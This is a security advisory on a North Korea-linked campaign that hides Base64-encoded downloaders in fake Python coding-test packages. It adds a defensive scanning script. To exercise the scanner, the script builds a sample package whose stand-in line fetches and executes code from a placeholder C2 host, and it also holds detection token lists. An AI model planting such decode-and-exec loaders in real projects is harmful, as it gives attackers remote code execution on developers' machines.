Multiple Linux Kernel Vulnerabilities
September 12, 2024
Multiple QNAP QTS and QuTS Hero Vulnerabilities
September 12, 2024
Severity
High
Analysis Summary
Cybersecurity researchers have discovered a fresh set of malicious Python packages that pose as coding assessments and target software developers. The newly identified samples were traced to GitHub projects linked to earlier, targeted attacks in which engineers were lured with fake job interviews.
According to the researchers, the activity is part of the VMConnect campaign, first identified in August 2023 and still active. Indications point to the North Korea-backed Lazarus Group. North Korean threat actors have made extensive use of job interviews as a malware delivery vector: they either approach unsuspecting developers on platforms like LinkedIn or trick them into installing malicious software under the guise of a skills test.
The packages have been hosted on attacker-controlled GitHub repositories or published directly on public registries such as npm and PyPI. Malicious code was found embedded in modified copies of legitimate PyPI modules such as pyrebase and pyperclip. In each case both the module's __init__.py file and the matching compiled Python file (PYC) under its __pycache__ directory carry the malicious code.
The code is implemented as a Base64-encoded string that conceals a downloader function; the downloader connects to a command-and-control (C2) server and executes the commands the server sends back. In one coding assignment examined by the researchers, the threat actors manufactured urgency by asking candidates to build a shared Python project, delivered as a ZIP file, within five minutes and then to find and fix a coding error within the next fifteen minutes.
This raises the likelihood that the candidate runs the package without any source code review or security checks, which is what the campaign's operators rely on to get the embedded malware executed on the developer's machine. Several of these tests purported to be technical interviews for financial organisations such as Capital One and Rookery Capital Limited, showing how the threat actors impersonate reputable businesses to carry out their operations.
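The layout described above (a Base64 string in __init__.py and in the matching PYC under __pycache__, decoded and executed to reach a C2) is exactly what a quick pre-run check can catch, and the five-minute deadline is the reason such a check should be automated rather than left to a manual read. The script below is an added example written for this page, not the advisory's or the campaign's code. The package name clipboard, the module util.py and the host c2.example.invalid are constructed stand-ins; the sample project is built in a temporary directory, is never imported, and contacts nothing.

```python
"""Pre-run triage of a take-home Python project. Added example, not code from the advisory
or the campaign: flags long Base64 strings that decode to code, exec()/eval() fed by a
decoder, and bytecode shipped under __pycache__ that disagrees with its source."""
import ast, base64, binascii, importlib.util, py_compile, re, struct, tempfile
from pathlib import Path

# Tokens that mark a decoded blob as a loader/downloader rather than data.
SUSPICIOUS = ("exec(", "eval(", "compile(", "urlopen", "socket", "subprocess", "__import__")
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify", "decompress"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")

def decode_b64_blobs(text):
    """Yield (blob, decoded) for Base64 runs that decode to readable text. In raw .pyc
    bytes a marshal length byte can be glued to the run, so a few start offsets are tried."""
    for m in B64_RE.finditer(text):
        run = m.group(0)
        for i in range(4):
            cand = run[i:i + (len(run) - i) // 4 * 4]
            try:
                decoded = base64.b64decode(cand, validate=True).decode("utf-8")
            except (binascii.Error, ValueError, UnicodeDecodeError):
                continue
            if all(c.isprintable() or c in "\n\r\t" for c in decoded):
                yield cand, decoded

def blob_findings(label, text):
    out = []
    for blob, decoded in decode_b64_blobs(text):
        hits = [t for t in SUSPICIOUS if t in decoded]
        if hits:
            out.append(f"{label}: {len(blob)}-char base64 blob decodes to code using {hits}")
    return out

def scan_source(path):
    text = path.read_text(errors="replace")
    findings = blob_findings(str(path), text)
    try:
        tree = ast.parse(text)
    except SyntaxError:
        return findings + [f"{path}: does not parse as Python"]
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval")):
            # Names of calls nested in the argument, e.g. base64.b64decode(...).
            inner = {getattr(c.func, "attr", None) or getattr(c.func, "id", "")
                     for a in node.args for c in ast.walk(a) if isinstance(c, ast.Call)}
            if inner & DECODERS:
                findings.append(f"{path}:{node.lineno}: {node.func.id}() over decoded data")
    return findings

def scan_pyc(pyc):
    """Bytecode is normally not shipped at all; check any .pyc against the source it claims."""
    data = pyc.read_bytes()
    # str constants lie as plain bytes in the marshal stream, so a raw scan finds the blob
    # without calling marshal.loads() on attacker-supplied data.
    findings = blob_findings(str(pyc), data.decode("latin-1"))
    if len(data) < 16 or data[:4] != importlib.util.MAGIC_NUMBER:
        return findings + [f"{pyc}: truncated or built for another interpreter version"]
    try:
        src = Path(importlib.util.source_from_cache(str(pyc)))
    except ValueError:
        src = None
    if src is None or not src.exists():
        return findings + [f"{pyc}: orphan bytecode with no matching source"]
    flags = struct.unpack("<I", data[4:8])[0]
    if flags & 1:  # hash-based pyc (PEP 552): header carries a hash of the source
        stale = data[8:16] != importlib.util.source_hash(src.read_bytes())
    else:          # timestamp-based pyc: header carries source mtime and size
        mtime, size = struct.unpack("<II", data[8:16])
        st = src.stat()
        stale = size != st.st_size or mtime != int(st.st_mtime)
    if stale:
        findings.append(f"{pyc}: compiled from different source than {src.name}")
    return findings

def scan_tree(root):
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.suffix == ".py":
            findings.extend(scan_source(p))
        elif p.suffix == ".pyc":
            findings.extend(scan_pyc(p))
    return findings

def build_sample_project():
    """Constructed sample: a clean module, a package trojanised the way the altered
    pyperclip above is described, and a helper whose shipped bytecode predates its source."""
    root = Path(tempfile.mkdtemp(prefix="takehome_"))
    (root / "app.py").write_text("def add(a, b):\n    return a + b\n")
    (root / "clipboard").mkdir()
    # Stand-in downloader; c2.example.invalid is a constructed, non-resolvable name.
    stage2 = ("import urllib.request\n"
              "exec(urllib.request.urlopen('http://c2.example.invalid/t').read())\n")
    blob = base64.b64encode(stage2.encode()).decode()
    init = root / "clipboard" / "__init__.py"
    init.write_text("import base64\n\ndef copy(text):\n    return text\n\n"
                    f"_P = '{blob}'\nexec(base64.b64decode(_P))\n")
    py_compile.compile(str(init), cfile=importlib.util.cache_from_source(str(init)))
    helper = root / "util.py"
    helper.write_text("X = 1\n")
    py_compile.compile(str(helper), cfile=importlib.util.cache_from_source(str(helper)))
    helper.write_text("X = 1  # edited after its bytecode was built\n")
    return root
```

Run `scan_tree(path)` on the extracted ZIP before executing anything; it returns one line per finding (`scan_tree(build_sample_project())` prints the three expected hits for the constructed sample). The .pyc check deliberately scans raw bytes instead of unmarshalling attacker-supplied data, and a header mismatch means the shipped bytecode was compiled from different source than the file you are reading, so the two must be reviewed together. Any of these findings is a reason to stop and run the assignment only in a disposable VM, if at all.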
The full extent of these activities is still unknown, but as Google-owned Mandiant recently noted, potential targets are identified and contacted via LinkedIn. After a chat exchange, the attacker sent a ZIP file containing malware called COVERTCATCH, disguised as a Python coding challenge. It fetched a second-stage payload that persisted on the victim's macOS machine through Launch Agents and Launch Daemons.
The development coincides with the disclosure by cybersecurity researchers that the North Korean threat actor codenamed Konni is stepping up attacks against South Korea and Russia, using spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps found with a campaign codenamed CLOUD#REVERSER (aka puNK-002). Some of these attacks also distribute a new malware called CURKON, a Windows shortcut (LNK) file that acts as a downloader for an AutoIt version of Lilith RAT. That activity has been attributed to a sub-cluster tracked as puNK-003.
Impact
- Command Execution
- Unauthorized Access
- Identity Theft
Remediation
- Ensure all operating systems and software, including applications, are up to date with the latest security patches, so that info-stealers and other malware cannot exploit known vulnerabilities.
- Employ reliable antivirus and antimalware software to detect and block known threats.
- Regularly update these tools to maintain the latest threat intelligence.
- Implement intrusion detection and prevention systems (IDPS) to detect and block unusual network activity, anomalous system behaviour, or similar threats.
- Enable two-factor authentication (2FA) on your accounts; it adds an extra layer of security and can help prevent unauthorized access even if your login credentials have been stolen.
- Regularly backing up your important data can help ensure that you don’t lose any critical information in the event of a malware infection or other data loss event.
- Be wary of emails, attachments, and links from unknown sources, and avoid downloading software from untrusted sources or clicking on suspicious ads or pop-ups. Treat coding assignments received from recruiters as untrusted code: review the source, including any shipped .pyc files under __pycache__, for Base64 blobs or decode-and-execute patterns before running anything, and run assignments only in an isolated, disposable environment regardless of how tight the deadline is.
- Use email filtering solutions to block malicious attachments and links that may deliver malware to users via phishing emails.
- Segment your network to limit lateral movement for attackers.
- Employ application whitelisting to only allow approved software to run on systems, reducing the risk of unauthorized applications being executed.
- Implement robust monitoring solutions to detect any unusual or suspicious activities, such as unauthorized access attempts or data exfiltration. Establish an effective incident response plan to respond to and mitigate any potential breaches quickly.